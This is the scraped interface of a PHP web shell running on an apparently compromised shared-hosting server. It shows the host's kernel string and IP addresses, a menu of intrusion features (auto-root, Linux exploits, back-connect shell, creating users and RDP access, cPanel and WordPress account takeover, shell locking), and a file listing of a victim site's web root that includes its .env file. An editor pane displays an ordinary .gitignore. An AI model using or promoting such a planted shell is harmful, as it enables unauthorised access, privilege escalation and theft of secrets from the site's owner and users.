Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.131
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
portal.tradesense.co.ke /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
writable
[ DIR ]
drwxr-xr-x
.env
4.69
KB
-rw-r--r--
.gitignore
1.82
KB
-rw-r--r--
ATEST NOTES
131
B
-rw-r--r--
LICENSE
1.13
KB
-rw-r--r--
README.md
2.45
KB
-rw-r--r--
composer.json
2.02
KB
-rw-r--r--
composer.lock
174.2
KB
-rw-r--r--
phpunit.xml.dist
2.01
KB
-rw-r--r--
spark
3.13
KB
-rw-r--r--
webportal.zip
37.69
MB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .gitignore
#------------------------- # Operating Specific Junk Files #------------------------- # OS X .DS_Store .AppleDouble .LSOverride # OS X Thumbnails ._* # Windows image file caches Thumbs.db ehthumbs.db Desktop.ini # Recycle Bin used on file shares $RECYCLE.BIN/ # Windows Installer files *.cab *.msi *.msm *.msp # Windows shortcuts *.lnk # Linux *~ # KDE directory preferences .directory # Linux trash folder which might appear on any partition or disk .Trash-* #------------------------- # Environment Files #------------------------- # These should never be under version control, # as it poses a security risk. .env .vagrant Vagrantfile #------------------------- # Temporary Files #------------------------- writable/cache/* !writable/cache/index.html writable/logs/* !writable/logs/index.html writable/session/* !writable/session/index.html writable/uploads/* !writable/uploads/index.html writable/debugbar/* php_errors.log #------------------------- # User Guide Temp Files #------------------------- user_guide_src/build/* user_guide_src/cilexer/build/* user_guide_src/cilexer/dist/* user_guide_src/cilexer/pycilexer.egg-info/* #------------------------- # Test Files #------------------------- tests/coverage* # Don't save phpunit under version control. phpunit #------------------------- # Composer #------------------------- vendor/ #------------------------- # IDE / Development Files #------------------------- # Modules Testing _modules/* # phpenv local config .php-version # Jetbrains editors (PHPStorm, etc) .idea/ *.iml # Netbeans nbproject/ build/ nbbuild/ dist/ nbdist/ nbactions.xml nb-configuration.xml .nb-gradle/ # Sublime Text *.tmlanguage.cache *.tmPreferences.cache *.stTheme.cache *.sublime-workspace *.sublime-project .phpintel /api/ # Visual Studio Code .vscode/ /results/ /phpunit*.xml /.phpunit.*.cache
Close